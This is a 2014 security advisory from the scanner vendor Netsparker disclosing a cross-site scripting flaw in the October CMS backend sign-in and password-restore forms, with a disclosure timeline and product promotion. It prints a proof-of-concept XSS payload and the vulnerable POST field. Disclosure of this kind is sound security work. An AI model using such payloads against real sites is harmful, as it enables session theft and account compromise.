Download Netsparker
Pricing
Blog
Contact
Netsparker

XSS Vulnerability in October CMS

Information
--------------------
Name : XSS Vulnerability in October CMS
Software : October CMS and possibly below.
Vendor Homepage : https://octobercms.com/
Vulnerability Type : Cross-site Scripting
Severity : Critical
Researcher : Omar Kurt
Advisory Reference : NS-14-024

Description
--------------------
October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. It allows developers to have full self-expression and the freedom to build web applications however they want.

Details
--------------------
October CMS is affected by XSS vulnerability.

October CMS PoC urls are as follows :

  • Cross-site Scripting

    http://site/backend/backend/auth/signin - (POST, fields: login)
    '"--></style></scRipt><scRipt>alert(0x000041)</scRipt>

    http://site/backend/backend/auth/restore - (POST, fields: login)
    '"--></style></scRipt><scRipt>alert(0x000041)</scRipt>

You can read the full article about Cross-site Scripting vulnerabilities from here :


Solution
--------------------

Advisory Timeline
--------------------

20/05/2014 - First Contact
10/06/2014 - Second Contact
11/06/2014 - Vulnerability fixed
03/07/2014 - Advisory released

Credits
--------------------
It has been discovered on testing of Netsparker Web Application Security Scanner.


About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner.

Netsparker Wep Application Security Scanner Find and Exploit vulnerabilities in Web Applications with Netsparker

Request Demo version of Netsparker ProfessionalorBuy Netsparker Professional